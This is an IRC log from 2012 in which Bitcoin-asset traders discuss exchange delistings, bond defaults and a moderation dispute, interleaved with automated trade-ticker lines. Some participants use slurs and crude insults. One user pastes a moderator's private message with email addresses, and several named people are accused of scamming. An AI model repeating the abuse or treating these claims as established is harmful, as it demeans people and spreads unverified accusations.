@ 0.0708 = 1.1328 BTC [-] Oct 03 06:24:29 i dont mean by trolls, i mean by mods... Oct 03 06:24:46 and the bleed goes on. Oct 03 06:25:02 it's very calm Oct 03 06:25:13 we'd like to point out that nefario was wrong Oct 03 06:25:15 does anyone think i should try to get my listing fees recovered since i am no longer listed and i did not violate the TOS? Oct 03 06:25:21 and you don't wanna lie... Oct 03 06:25:24 not to the moo-ooods Oct 03 06:25:25 which is a joke? .B ? Oct 03 06:25:39 http://www.youtube.com/watch?v=kB6qE1W5fUM Oct 03 06:25:51 no you do not do what you say, you say you will back .A with .B, except when you change your mind Oct 03 06:25:55 yes i did Oct 03 06:26:20 it does not explain why you can buy .b without moving that to .A or buying back .A Oct 03 06:26:40 A might need it later, then what? Oct 03 06:26:49 ? Oct 03 06:27:07 no chance to default ever? Oct 03 06:27:12 well void all the contracts, lol Oct 03 06:28:01 ok well i prefered ".A won't default cause you can use .B to cover" over "trust me" Oct 03 06:31:09 i'm not a shareholder anymore, i sold the moment i saw you buy "High risk passthrough" shares for a "low risk insured investments only" fund Oct 03 06:32:13 [GLBSE] [ASICMINER] 6 @ 0.1099998 = 0.66 BTC [+] Oct 03 06:33:25 are the holdings of .A public? Oct 03 06:33:42 its all low risk DMC Oct 03 06:34:11 safe as houses Oct 03 06:34:32 [GLBSE] [ASICMINER] 30 @ 0.11 = 3.3 BTC [+] Oct 03 06:34:44 [MPEX] [S.MPOE] 2718 @ 0.00036251 = 0.9853 BTC [+] Oct 03 06:35:58 [GLBSE] [THUNDERCM.MIF.SHARES] 5 @ 0.483 = 2.415 BTC [+] Oct 03 06:37:09 [MPEX] [S.MPOE] 29492 @ 0.00036527 = 10.7725 BTC [+] Oct 03 06:37:10 [MPEX] [S.MPOE] 13570 @ 0.0003653 = 4.9571 BTC [+] Oct 03 06:37:12 [MPEX] [S.MPOE] 41200 @ 0.00036619 = 15.087 BTC [+] Oct 03 06:37:13 [MPEX] [S.MPOE] 31800 @ 0.00036661 = 11.6582 BTC [+] Oct 03 06:37:14 [MPEX] [S.MPOE] 9900 @ 0.00036671 = 3.6304 BTC [+] Oct 03 06:37:14 [MPEX] [S.MPOE] 47500 @ 0.00036675 = 17.4206 BTC [+] Oct 03 06:37:15 [MPEX] [S.MPOE] 50126 @ 0.0003671 = 18.4013 BTC [+] Oct 03 06:37:17 [MPEX] [S.MPOE] 48727 @ 0.00036754 = 17.9091 BTC [+] Oct 03 06:37:18 [MPEX] [S.MPOE] 49200 @ 0.00036757 = 18.0844 BTC [+] Oct 03 06:37:19 [MPEX] [S.MPOE] 39000 @ 0.00036801 = 14.3524 BTC [+] Oct 03 06:37:20 [MPEX] [S.MPOE] 58516 @ 0.00036852 = 21.5643 BTC [+] Oct 03 06:37:21 [MPEX] [S.MPOE] 48100 @ 0.00036869 = 17.734 BTC [+] Oct 03 06:37:22 [MPEX] [S.MPOE] 39100 @ 0.0003692 = 14.4357 BTC [+] Oct 03 06:37:23 [MPEX] [S.MPOE] 35237 @ 0.00036962 = 13.0243 BTC [+] Oct 03 06:37:24 [MPEX] [S.MPOE] 17032 @ 0.00037006 = 6.3029 BTC [+] Oct 03 06:41:08 The transparency and safety is in BTC-BOND Oct 03 06:42:19 you're running out of things to invest in namj Oct 03 06:43:53 thanks for the link Oct 03 06:44:33 HRPT does not fit the risk profile for me for .A i would rather they were sold and the btc held until appropriate assets could be found Oct 03 06:44:38 oh is that what you did? Oct 03 06:44:46 cool Oct 03 06:45:16 bless you Oct 03 06:55:17 [MPEX] [S.MPOE] 15000 @ 0.00037006 = 5.5509 BTC [+] Oct 03 06:55:54 I <3 JoelKatz Oct 03 06:57:19 'I will give you the benefit of the doubt but you are either an idiot or a scammer' Oct 03 06:58:36 lol dub Oct 03 06:58:37 link? Oct 03 06:59:50 he said this too about maged Oct 03 06:59:51 I will give you the benefit of the doubt and assume this was just a bad decision on your part. But several people have already told me privately that they believe you are conspiring with Nefario to appear to pressure him into an agreement that we all know Goat won't accept to shift the blame to Goat. I hope that's not true and that this was just an honest lapse in judgment. Oct 03 07:01:51 eh ?! Oct 03 07:01:57 just how thick can this plot get! Oct 03 07:02:09 as thick as lexington steele! Oct 03 07:02:26 damn, he's not here Oct 03 07:03:42 [GLBSE] [BMF] 1 @ 0.46999999 BTC [+] Oct 03 07:04:09 oh lol smoovious Oct 03 07:04:51 anyone who has read that thread knows what you said. you vs everyone but mages, lol Oct 03 07:08:34 people like drama Oct 03 07:08:39 they like making it Oct 03 07:12:49 I loved Miller's The Crucible Oct 03 07:12:51 pretty dramatic **** BEGIN LOGGING AT Wed Oct 3 14:24:12 2012 Oct 03 14:27:47 [MPEX] [S.MPOE] 1000 @ 0.0003603 = 0.3603 BTC [-] Oct 03 14:36:27 Chaang-Noi: it's really hard to trust any shares on any exchange now days. Oct 03 14:36:40 yup Oct 03 14:36:50 i would not buy anything at this time Oct 03 14:37:10 true, its hard to trust anybody, not onlyexchanges... Oct 03 14:37:17 yup Oct 03 14:37:20 it'll pass Oct 03 14:37:37 no more drama from me mp on the glbse delisting Oct 03 14:37:37 maybe if / when pirate pays back? :P Oct 03 14:37:49 not sure if you saw my last post Oct 03 14:37:54 im sure maged will ban me lol Oct 03 14:39:53 at the moment its much easier to list those who didnt default than those who did... Oct 03 14:41:10 [GLBSE] [SILVER] 1 @ 0.00999998 BTC [-] Oct 03 14:41:12 [GLBSE] [SILVER] 1 @ 0.00999999 BTC [+] Oct 03 14:41:20 starting with pirate / matthew / rusty / obsi / BDT / ... the list seems endless Oct 03 14:42:13 hashking / nckrazze / MBT ... Oct 03 14:42:36 you only have to go through the lending section and find "scammers" Oct 03 14:42:44 [07:39] at the moment its much easier to list those who didnt default than those who did... Oct 03 14:42:46 hahah Oct 03 14:42:54 pretty much Oct 03 14:44:16 Oh, yes, those who didn't default Oct 03 14:44:24 The would be... Oct 03 14:44:38 s/The/They/ Oct 03 14:48:32 i did not default... but was delsited haha Oct 03 14:48:37 who else did not default? Oct 03 14:51:51 chirp chirp? Oct 03 14:52:14 Chaang-Noi hacked my wallet and stole my BC Oct 03 14:52:17 i cant be the only person who did not default can id? Oct 03 14:52:20 tumbleweed then... Oct 03 14:52:49 oh there was versicudo or whatever Oct 03 14:52:52 he did not default Oct 03 14:52:55 any others? Oct 03 14:52:56 Chaang-Noi: won't you default if pirate never pays? Oct 03 14:52:57 [MPEX] [F.GIGA.ETF] 1947 @ 0.00045474 = 0.8854 BTC [+] Oct 03 14:53:16 i paid my insured bonds already, i dont understand your question Oct 03 14:53:25 well all your money was with pirate Oct 03 14:53:28 if pirate doesnt give it back Oct 03 14:53:30 you have no money Oct 03 14:53:32 thus default Oct 03 14:53:36 i did not give all my money to pirate Oct 03 14:53:41 i has risk management skills Oct 03 14:53:43 ok 94% Oct 03 14:53:45 seems no one else had them Oct 03 14:53:55 i paid back everything Oct 03 14:53:55 chang Oct 03 14:53:57 how many ltc do yuo have Oct 03 14:54:03 out of curiosity Oct 03 14:54:07 did you get to 100k yet? Oct 03 14:54:07 check the address you sent to yesterday Oct 03 14:54:13 its well over 100k Oct 03 14:54:16 nice! Oct 03 14:54:26 fuck im going to buy more at market right now Oct 03 14:54:28 watch it go up Oct 03 14:54:29 why not sell now for a healthy profit Oct 03 14:54:29 ? Oct 03 14:54:40 actually i guess it wouldnt be too healthy Oct 03 14:54:45 i sold to you at 0.006 before Oct 03 14:56:07 i sold a lot at .008 to .006 Oct 03 14:57:05 but i bought a lot at .0005 to .002 Oct 03 14:57:17 my 100k plus ltc are more or less free Oct 03 15:12:36 ;;seen nefario Oct 03 15:12:36 nefario was last seen in #bitcoin-assets 1 week, 1 day, 16 hours, 12 minutes, and 41 seconds ago: Those assets are not listed or traded anymore Oct 03 15:12:49 where is this guy? Oct 03 15:13:42 I guess with all Pirate and goat related stuff gone... has no reason to come here... Oct 03 15:14:50 is he in forum? Oct 03 15:14:53 are you anti goat stuff farfi? Oct 03 15:15:02 he has been afk the forum as well Oct 03 15:15:36 anti goat? meaningless :) Oct 03 15:16:39 I am no anti* blah. If one fucked up and other did too, then lets untangle the cluster-fuck and move on. Oct 03 15:17:16 not sure how i fucked up but meh Oct 03 15:17:32 looks like those forum mods have no balls to ask the proper questions :) Oct 03 15:18:02 [MPEX] [S.MPOE] 10328 @ 0.0003603 = 3.7212 BTC [-] Oct 03 15:18:03 [MPEX] [S.MPOE] 10100 @ 0.00036019 = 3.6379 BTC [-] Oct 03 15:18:04 [MPEX] [S.MPOE] 30372 @ 0.00036003 = 10.9348 BTC [-] Oct 03 15:18:09 political correctness is the main cause for most of the fuck ups Oct 03 15:19:24 i was not being politicaly correct haha Oct 03 15:24:20 [GLBSE] [LTC-MINING] 3 @ 0.43 = 1.29 BTC [+] Oct 03 15:24:22 [GLBSE] [LTC-MINING] 2 @ 0.4152 = 0.8304 BTC [-] Oct 03 15:24:22 [GLBSE] [LTC-MINING] 6 @ 0.4152 = 2.4912 BTC [-] Oct 03 15:24:23 [GLBSE] [LTC-MINING] 11 @ 0.415 = 4.565 BTC [-] Oct 03 15:24:25 [GLBSE] [LTC-MINING] 20 @ 0.4101 = 8.202 BTC [-] Oct 03 15:24:26 [GLBSE] [LTC-MINING] 11 @ 0.41 = 4.51 BTC [-] Oct 03 15:25:45 Chaang-Noi- of course not Oct 03 15:26:02 okay :) Oct 03 15:26:08 [GLBSE] [GIGAMINING] 1 @ 0.54121001 BTC [-] Oct 03 15:26:23 Have some myself... waiting patiently... Oct 03 15:26:33 i dont know how it will get fixed Oct 03 15:26:50 VERY patiently then :) Oct 03 15:27:02 it will be nice if nefario does take liability for things going wrong Oct 03 15:27:11 http://news.cnet.com/8301-13578_3-57524109-38/justice-dept-to-defend-warrantless-cell-phone-tracking/ Oct 03 15:27:12 FUCK Oct 03 15:27:13 YOU Oct 03 15:27:26 and people wonder why i dont have aphone Oct 03 15:27:35 [GLBSE] [NYAN.B] 1 @ 0.34961279 BTC [-] Oct 03 15:27:36 lol Oct 03 15:27:36 [GLBSE] [NYAN.B] 1 @ 0.41785599 BTC [+] Oct 03 15:27:37 [GLBSE] [NYAN.B] 1 @ 0.45 BTC [+] Oct 03 15:27:40 it's ok, i don't have one either. Oct 03 15:28:24 [GLBSE] [GIGAMINING] 1 @ 0.54121 BTC [-] Oct 03 15:28:43 i have a phone,. but i only use it as a portable internet connection Oct 03 15:28:56 [GLBSE] [NYAN.B] 1 @ 0.635 BTC [+] Oct 03 15:29:27 [GLBSE] [YABMC] 1 @ 0.077 BTC [-] Oct 03 15:29:39 [GLBSE] [GIGAMINING] 6 @ 0.5412 = 3.2472 BTC [-] Oct 03 15:31:09 [GLBSE] [GIGAMINING] 5 @ 0.54120001 = 2.706 BTC [+] Oct 03 15:32:40 [GLBSE] [YABMC] 1 @ 0.076 BTC [-] Oct 03 15:32:40 [GLBSE] [YABMC] 1 @ 0.075 BTC [-] Oct 03 15:32:42 [GLBSE] [YABMC] 1 @ 0.074 BTC [-] Oct 03 15:32:43 [GLBSE] [YABMC] 1 @ 0.073 BTC [-] Oct 03 15:32:44 [GLBSE] [YABMC] 1 @ 0.072 BTC [-] Oct 03 15:32:45 [GLBSE] [YABMC] 1 @ 0.071 BTC [-] Oct 03 15:34:44 everything seems sell :/ Oct 03 15:34:50 [GLBSE] [GIGAMINING] 1 @ 0.54989999 BTC [+] Oct 03 15:39:15 [GLBSE] [FPGAMINING] 1 @ 0.4 BTC [+] Oct 03 15:39:17 [GLBSE] [FPGAMINING] 1 @ 0.375 BTC [-] Oct 03 15:39:18 [GLBSE] [FPGAMINING] 1 @ 0.336 BTC [-] Oct 03 15:39:18 [GLBSE] [FPGAMINING] 4 @ 0.2502 = 1.0008 BTC [-] Oct 03 15:39:20 [GLBSE] [FPGAMINING] 1 @ 0.25 BTC [-] Oct 03 15:40:45 even dead cats are not bouncing Oct 03 15:41:10 [GLBSE] [GIGAMINING] 9 @ 0.54999999 = 4.95 BTC [+] Oct 03 15:41:11 [GLBSE] [GIGAMINING] 9 @ 0.55 = 4.95 BTC [+] Oct 03 15:41:30 ok, one dead cat did a tiny bounce :) Oct 03 15:43:48 [MPEX] [S.MPOE] 35228 @ 0.00036003 = 12.6831 BTC [-] Oct 03 15:43:49 [MPEX] [S.MPOE] 14700 @ 0.0003599 = 5.2905 BTC [-] Oct 03 15:43:49 [MPEX] [S.MPOE] 8037 @ 0.00035987 = 2.8923 BTC [-] Oct 03 15:53:45 [GLBSE] [YABMC] 1 @ 0.07 BTC [-] Oct 03 15:53:46 [GLBSE] [YABMC] 1 @ 0.069 BTC [-] Oct 03 16:01:53 [GLBSE] [RAREEARTH] 5 @ 0.01 = 0.05 BTC [+] Oct 03 16:04:34 [GLBSE] [YABMC] 1 @ 0.068 BTC [-] Oct 03 16:04:36 [GLBSE] [YABMC] 1 @ 0.067 BTC [-] Oct 03 16:04:37 [GLBSE] [YABMC] 8 @ 0.066 = 0.528 BTC [-] Oct 03 16:04:37 [GLBSE] [YABMC] 2 @ 0.06512 = 0.1302 BTC [-] Oct 03 16:04:38 [GLBSE] [YABMC] 3 @ 0.065 = 0.195 BTC [-] Oct 03 16:09:01 [MPEX] [F.GIGA.ETF] 5966 @ 0.00045478 = 2.7132 BTC [+] Oct 03 16:09:25 [GLBSE] [GSDPT] 50 @ 0.00339 = 0.1695 BTC [+] Oct 03 16:10:55 [GLBSE] [BITBOND] 1 @ 0.24 BTC [-] Oct 03 16:18:22 [GLBSE] [BITBOND] 1 @ 0.23 BTC [-] Oct 03 16:19:05 [GLBSE] [BITBOND] 1 @ 0.23 BTC [-] Oct 03 16:29:22 [GLBSE] [GIGAMINING] 11 @ 0.5599 = 6.1589 BTC [+] Oct 03 16:30:01 lol Oct 03 16:30:17 the reatrds took the lack of understanding a mining bond to the delisting Oct 03 16:30:26 saying nefario delisted cuz i did not mine when i had a mining bond! Oct 03 16:30:29 ahhahahahahahaha Oct 03 16:30:50 https://bitcointalk.org/index.php?topic=112551.msg1241829#msg1241829 Oct 03 16:30:54 i thought drama was done Oct 03 16:31:00 but they keep pulling me back in Oct 03 16:31:10 [GLBSE] [BITBOND] 1 @ 0.22000001 BTC [-] Oct 03 16:31:12 [GLBSE] [BITBOND] 1 @ 0.22 BTC [-] Oct 03 16:34:08 [MPEX] [S.MPOE] 15163 @ 0.00035987 = 5.4567 BTC [-] Oct 03 16:34:09 [MPEX] [S.MPOE] 24140 @ 0.00035983 = 8.6863 BTC [-] Oct 03 16:37:44 [GLBSE] [BFLS] 1 @ 0.60500002 BTC [-] Oct 03 16:38:31 [GLBSE] [BFLS] 1 @ 0.60500003 BTC [+] Oct 03 16:38:31 [GLBSE] [BFLS] 1 @ 0.60500001 BTC [-] Oct 03 16:38:33 this chan is always active Oct 03 16:38:33 [GLBSE] [BFLS] 5 @ 0.605 = 3.025 BTC [-] Oct 03 16:38:36 why dead now? Oct 03 16:38:47 only action is people selling glbse shares.... Oct 03 16:39:51 [GLBSE] [BFLS.RIG] 1 @ 0.65 BTC [-] Oct 03 16:41:42 Exactly, ppl is busy selling Oct 03 16:41:55 Don't found time to talk Oct 03 16:41:56 lol Oct 03 16:46:37 "payback is to build trust for the future" Oct 03 16:46:48 evening :) Oct 03 16:46:51 so basically, anyone doing any business, legit or not, can be labelled a scammer Oct 03 16:47:30 any angry screaming crowd I have to take care of yet? Oct 03 16:47:41 not yet today Oct 03 16:48:09 oki, I have yet to get any death threats so that's a plus. I have had some angry people, but they were very civilized about their anger. I am impressed Oct 03 16:48:50 [GLBSE] [BMMO] 2 @ 0.04499838 = 0.09 BTC [+] Oct 03 16:48:52 [GLBSE] [BMMO] 62 @ 0.04499839 = 2.7899 BTC [+] Oct 03 16:48:53 [GLBSE] [BMMO] 1 @ 0.0449984 BTC [+] Oct 03 16:48:54 [GLBSE] [BMMO] 50 @ 0.04499866 = 2.2499 BTC [+] Oct 03 16:48:55 [GLBSE] [BMMO] 20 @ 0.044999 = 0.9 BTC [+] Oct 03 16:48:56 [GLBSE] [BMMO] 170 @ 0.045 = 7.65 BTC [+] Oct 03 16:49:01 I foresee everybody labeled as scammer by default... Oct 03 16:50:35 guilty until proven innocent Oct 03 16:50:41 just like the real world Oct 03 16:51:29 heh Oct 03 16:51:39 yea that logic is just retarded. Oct 03 16:52:00 You are a scammer, why? because you can't prove that you aren't. Well I haven't scammed anyone yet? doesn't matter you can't prove that you won't Oct 03 16:52:13 essentially Oct 03 16:52:23 and if you pay everyone back, by definition, that isn't a ponzi Oct 03 16:52:39 That paired with the lynch mobs is scary Oct 03 16:52:58 but I'll just shut up and go back to my corner Oct 03 16:53:10 I never guaranteed anything. I actually stated the only thing I guarantee is that I will try my best. Oct 03 16:53:21 But they will probably get me a scam tag some how anyways. Oct 03 16:53:52 There's no place left in the corner Oct 03 16:54:25 I don't think why Chaang-Noi would be labelled a scammer for not investing into mining equipment. I've just posted in the thread asking how it would make a difference. Oct 03 16:55:28 Funnier thing is that I bet most people even made a profit if you count it in fiat Oct 03 16:55:37 The idea is if he doesn't invest into mining then he might not be able to pay it back hence he's a scamer. Oct 03 16:55:53 i can see how people have thought but it's not logical. yet again people are jumping to conclusions Oct 03 16:55:53 You have to be aware that you're kind of shorting BTC when you invest Oct 03 16:55:55 rdponticelli is the only one converting to FIAT when it's time to compute a profit/loss :) Oct 03 16:56:12 Ooops, forgot one word Oct 03 16:56:17 rdponticelli: usagi is the only one converting to FIAT when it's time to compute a profit/loss :) Oct 03 16:56:39 OneEyed: I'm not Oct 03 16:56:59 But I'm saying that if you want your btc so much, keep them Oct 03 16:57:15 and if you dont want them, send over here. Oct 03 16:57:49 If you buy equipment, you're investing in the security of the network, but you may lost profitability in pure BTC Oct 03 16:57:51 How can people invest in perpetual (i.e. no buyback date!) fixed mining bonds? Oct 03 16:57:54 But if BTC isn't secure, btc is worth nothing Oct 03 16:58:10 This reminds be of this "mining turds" thread, which was right to the point Oct 03 16:58:36 So, you have to look at the big picture Oct 03 16:58:43 [GLBSE] [SILVER] 15 @ 0.00999999 = 0.15 BTC [+] Oct 03 16:59:13 There's plenty of people who just throw coins at things... Oct 03 16:59:22 [MPEX] [S.MPOE] 39933 @ 0.00035983 = 14.3691 BTC [-] Oct 03 16:59:24 [MPEX] [S.MPOE] 29567 @ 0.00035978 = 10.6376 BTC [-] Oct 03 17:00:00 [GLBSE] [GSDPT] 42 @ 0.00339 = 0.1424 BTC [+] Oct 03 17:00:01 [GLBSE] [GSDPT] 1128 @ 0.0033994 = 3.8345 BTC [+] Oct 03 17:00:03 [GLBSE] [GSDPT] 1018 @ 0.0033995 = 3.4607 BTC [+] Oct 03 17:00:03 [GLBSE] [GSDPT] 2212 @ 0.0034 = 7.5208 BTC [+] Oct 03 17:00:48 imsaguy2 i loled at that as well Oct 03 17:01:50 DeaDTerra you just called me a scammer? Oct 03 17:03:05 no Oct 03 17:03:10 Chaang-Noi: he didn't, he just explained how people seem to see it Oct 03 17:03:16 I just said that I understand how they are thinking but the logic is totally incorrect Oct 03 17:03:16 okay Oct 03 17:03:32 okay thanks Oct 03 17:03:43 Instead of backing the bonds with hardware you are backing it with private capital that doesn't make you a scammer. Oct 03 17:03:58 People should learn to do some basic mathematical infinite sums or integration before investing in such a "perpetual" bond Oct 03 17:04:13 not paying makes you a scammer. But I mean GIGAVPS could just say fuck it I am not paying even though he has hardware, so hardware does not mean securer or better backing. Oct 03 17:04:20 btw sorry to see you leave DeaDT Oct 03 17:04:22 (or count on finding gullible people to buy the bonds) Oct 03 17:04:44 deadt was about the oly guy i trusted with my btc for a while Oct 03 17:04:48 only Oct 03 17:04:56 I am not leaving, just stepping down for a while ^^ I need to finish school and I need to see how the market develops. I will keep running my own projects behind the scene ;) so don't worry about me Oct 03 17:05:16 best of luck Oct 03 17:05:35 thanks m8, same to you. I hope Nefario changes his mind and relists your assets again. Oct 03 17:05:57 he wont Oct 03 17:06:03 If you buy equipment.. but you may lost profitability in pure BTC << True, but you're also diversifying a bit so taht if the exchange rate starts going down, you'll still have a net gain in USD because of the mining income Oct 03 17:06:07 its essentially a diversification Oct 03 17:06:14 people miss that concept Oct 03 17:06:24 right now it isn't obvious because diff and price are going up Oct 03 17:06:41 if/when there's a time it comes crashing down again (ala last June), they'll be glad its there Oct 03 17:06:52 Yeap, that's what I meant Oct 03 17:06:54 Yes, its essentially a short Oct 03 17:07:19 you can't have everything Oct 03 17:07:24 there's always a cost/benefit Oct 03 17:08:14 if nefario delisted me cuz mining bonds oh lol Oct 03 17:08:14 So, if somebody just want their coins, he must held them himself Oct 03 17:08:46 If you're putting them somewhere, anywhere, you're risking, and in a way you're shorting Oct 03 17:08:55 aye Oct 03 17:09:58 if you dont hold it you dont own it Oct 03 17:10:38 But is important to notice too that investing in hardware, and even in mining bond, is investing in the security of the network Oct 03 17:10:41 there's a very rudimentary definition Oct 03 17:11:17 who wants to sell me 720 ltc? Oct 03 17:11:35 So what you loose on nominal terms in pure btc, you gain on the relative value between btc and other commodities Oct 03 17:11:56 Because you have a more secure network Oct 03 17:12:19 lol Oct 03 17:12:25 ltc, good one Oct 03 17:12:47 ? Oct 03 17:12:59 you dont like ltc? Oct 03 17:15:52 imsaguy2: My definition was rudimentary? Oct 03 17:16:03 There's anything wrong with them? Oct 03 17:16:12 s/them/it/ Oct 03 17:17:21 [GLBSE] [BITBOND] 2 @ 0.21530001 = 0.4306 BTC [-] Oct 03 17:17:23 [GLBSE] [BITBOND] 5 @ 0.2153 = 1.0765 BTC [-] Oct 03 17:17:23 [GLBSE] [BITBOND] 23 @ 0.2153 = 4.9519 BTC [-] Oct 03 17:17:24 [GLBSE] [BITBOND] 9 @ 0.2152 = 1.9368 BTC [-] Oct 03 17:17:26 [GLBSE] [BITBOND] 50 @ 0.215 = 10.75 BTC [-] Oct 03 17:17:35 sell sell sell Oct 03 17:19:47 so in case anyone cares : i've switched my blog to english now. Oct 03 17:19:53 http://trilema.com/2012/me-they-say/ this'd be the first article. Oct 03 17:20:05 it still has that scary dude in the header Oct 03 17:20:05 rdponticelli coming up next, i'ma weigh on mpex listing criteria. Oct 03 17:20:12 Azelphur well ya, that's me lol Oct 03 17:20:47 anyone think i will get banned for "scamming" from the forum soon? Oct 03 17:20:50 :P Oct 03 17:20:59 Chaang-Noi i haven't caught up with it all yet Oct 03 17:21:04 but did anyone get banned for scamming yet ? Oct 03 17:21:07 others have Oct 03 17:21:07 i thought they just tag Oct 03 17:21:32 i was told i would get banned if i did not do someht maged asked Oct 03 17:21:35 or demanded Oct 03 17:21:37 i did not do it Oct 03 17:24:28 [MPEX] [S.MPOE] 9429 @ 0.00035978 = 3.3924 BTC [-] Oct 03 17:24:29 [MPEX] [S.MPOE] 52271 @ 0.00035974 = 18.804 BTC [-] Oct 03 17:25:00 Chaang-Noi: banned? Oct 03 17:25:06 how are they going to do that? Oct 03 17:25:10 ip bans are useless Oct 03 17:25:18 my acount Oct 03 17:25:40 Sorry to bring you into this, but I have to. Oct 03 17:25:40 Within the next 48 hours, please CC Maged@lordaeron.org and theymos@mm.st in an email to Nefario that contains the Bitcoin address you want him to send to. GPG sign it if you have a recognized GPG key. Oct 03 17:25:41 Failure to do so will result in you being marked as a scammer and possibly even banned for the following reasons: Oct 03 17:25:41 1) Publicly lying about having sent Nefario a Bitcoin address. This will be considered libel and ALL posts, made by anybody, referencing this specific lie will be DELETED to protect the forum from legal action. Oct 03 17:25:42 2) Not attempting to uphold your contract with your investors in good faith. Oct 03 17:25:44 I've had it with these games, from BOTH Nefario and you. Oct 03 17:26:01 but the thing is... i did not play games or lie Oct 03 17:26:11 nefario lied to maged Oct 03 17:26:24 and them maged covered for nefario saying it was a misunderstanding Oct 03 17:26:52 interesting Oct 03 17:27:00 so now they are claiming libel? Oct 03 17:27:02 why are you dumping their emails lol Oct 03 17:27:04 but all the other slanders are ok? Oct 03 17:27:05 he then went on to say i was acting in bad faith after i send him the weeks emails Oct 03 17:27:33 so wait you didn't send a btc address ?! Oct 03 17:27:45 theymos told me that PM are not private messages but personallal messages Oct 03 17:27:52 lolz Oct 03 17:27:57 if maged wanted it to be private he would have sent via email Oct 03 17:28:04 ahaha you little bitch you Oct 03 17:28:16 i sent the address to nefario Oct 03 17:28:21 not to theymos and maged Oct 03 17:28:25 so they can ban my ass Oct 03 17:29:03 smoovious... no one cares what you think... you are a retard for not understandig what a bond is Oct 03 17:29:11 lol, getting your ass banned could be the next step... Oct 03 17:29:33 i expect they will ban me Oct 03 17:29:42 glbse is almost destroyed Oct 03 17:29:46 they need revenge Oct 03 17:29:51 "they" Oct 03 17:30:20 i was going to get banned if i did not do what maged demanded Oct 03 17:30:22 [GLBSE] [BIT.INC] 1 @ 0.1 BTC [+] Oct 03 17:30:23 how fucked up is that Oct 03 17:31:21 GLBSE/MPEx are prolly gonna die anyway, because all the US assets are unable to follow SEC regulations Oct 03 17:31:30 so at some point in the future all the US assets will have to delist Oct 03 17:31:47 smoovious lick my cock cunt... Oct 03 17:31:59 Azelphur, even if not illegal, they won't have the funds to defend themselves Oct 03 17:32:09 that too :p Oct 03 17:32:14 in a way im glad i got delisted. Oct 03 17:32:25 im glad im out, but im not glad i cant pay people back Oct 03 17:32:35 cuz this shit will not ever end Oct 03 17:33:19 you cant even understand how a mining bond works... Oct 03 17:33:30 did you start the scammer thread yet? Oct 03 17:33:55 lol Oct 03 17:33:57 idot Oct 03 17:34:24 sorry typo, i meant asshat.. Oct 03 17:34:36 idot is much worse. Oct 03 17:34:44 smells like iDevice. Oct 03 17:34:50 :) Oct 03 17:35:01 is that like iderp? Oct 03 17:35:05 ya! Oct 03 17:35:18 i:) Oct 03 17:36:00 i know a lot of people do not like me, and many more even hate me, but really if you cant understand how a mining bond works, this is not the palce for you. Oct 03 17:36:38 yes nefario and glbse did exactly what i wanted them to do, im the pupet master... Oct 03 17:36:51 opportunistic troll here Oct 03 17:36:53 lol Oct 03 17:36:58 read more goddamn goat text Oct 03 17:37:09 :) Oct 03 17:38:00 smoovious is just jelly, has no btc, so calls me scammer cuz cant understand contract... Oct 03 17:38:01 lol Oct 03 17:38:23 nomnomnom Oct 03 17:38:31 yu never fail to provide, goat Oct 03 17:38:50 YU TOO smoo Oct 03 17:38:52 :P Oct 03 17:38:59 take yer troll hat off :P Oct 03 17:39:16 kiss and make up you two, we know yu dont mean it Oct 03 17:39:18 hey tiggr, how has it been? Oct 03 17:39:21 my hat comes off and on with ease Oct 03 17:39:24 o/ goat Oct 03 17:39:24 it's an old hat Oct 03 17:39:45 smoo is hung up on the bonds Oct 03 17:39:51 ya i see that Oct 03 17:39:56 stop feeding the trolls :P Oct 03 17:40:01 no offense smoo Oct 03 17:40:06 its been going on for months and he just now is rejecting them Oct 03 17:40:14 im bored Oct 03 17:40:17 lol Oct 03 17:40:23 smoo is the only toy i can play with :9 Oct 03 17:40:27 Chaang-Noi suicide? Oct 03 17:40:51 oh smoo Oct 03 17:41:00 not everyone can understand... Oct 03 17:41:07 damn .. whenever i am hungry i just know to look for goat or smoo on my graohs these days :P Oct 03 17:41:11 we still lvoe you Oct 03 17:41:31 tiggr, odds on my getting banned in the next few days on the forum? Oct 03 17:41:56 go roll a spliff and go watch the blockchain spend for a while at ISeeCoins.org Oct 03 17:41:58 ;) Oct 03 17:42:03 its mezmerizing Oct 03 17:42:10 maged said i would be banned in 48 hours... Oct 03 17:42:14 its been like 24 Oct 03 17:42:15 lol Oct 03 17:42:21 i need weed Oct 03 17:42:23 banned from what? Oct 03 17:42:23 but dont haz Oct 03 17:42:26 is that bitcoin-hours? Oct 03 17:42:27 the forum Oct 03 17:42:34 so make another account? Oct 03 17:42:41 liek dog-years but diff Oct 03 17:42:49 why would i make a new account? Oct 03 17:42:52 n1 smoo Oct 03 17:43:00 because you seem to care about being banned Oct 03 17:43:24 i dont care Oct 03 17:43:30 well i do care Oct 03 17:43:38 i gave 50 btc to the forum as a donoation Oct 03 17:43:44 and about 100 btc in adds Oct 03 17:43:48 cuz i love btc Oct 03 17:43:49 turn "autolayout" on at iseecoins for maximum psychadelic effect :P Oct 03 17:43:52 chillax Oct 03 17:43:55 but if they do ban me, i wont come back Oct 03 17:44:11 ;;bc,goatbanestimate Oct 03 17:44:15 :) Oct 03 17:44:16 Error: "bc,goatbanestimate" is not a valid command. Oct 03 17:44:21 cuz i love btc << WORD to that Oct 03 17:44:24 ahhh damn you gribble Oct 03 17:44:28 thats why we're here isnt it Oct 03 17:44:42 they be protecting nefario and glbse Oct 03 17:44:46 but i was not wrong Oct 03 17:44:56 will they abuse power even more and snuff me? Oct 03 17:44:58 we will see Oct 03 17:45:14 [MPEX] [S.BVPS] 7090 @ 0.00341 = 24.1769 BTC [-] Oct 03 17:45:22 im watching too Oct 03 17:45:35 but wishing i was high Oct 03 17:47:54 Smoovious: hrmmm ... mebbe try Ctrl-+ Oct 03 17:47:59 then F11 Oct 03 17:48:10 but damn its pretty :D Oct 03 17:48:29 i like to watch the little dots fire out to a satoshifish as they are spent on 1dice* Oct 03 17:49:39 Chaang-Noi, sexually? Oct 03 17:49:41 thnx - noted Oct 03 17:49:53 ? Oct 03 17:49:56 notice ive added a "scrfeenshot" button Smoovious Oct 03 17:50:06 so you can save cool shit that hapens :D Oct 03 17:50:16 Fuck me, I hadn't seen NYAN.B closing announce. I've missed yesterday's movie of the day Oct 03 17:50:31 snuff as in fliming a killing? Oct 03 17:50:46 no iv never made a snuff film jackass Oct 03 17:50:50 Smoovious: yes Oct 03 17:51:08 also goto iseecoins.org/Wot.html Oct 03 17:51:19 thats a graph of the otc Web Of Trust ratings system Oct 03 17:51:23 searchable and stuff Oct 03 17:51:25 Cannot GET /Wot.html Oct 03 17:51:25 be patient Oct 03 17:51:30 its bloody huge Oct 03 17:51:35 WoT.html Oct 03 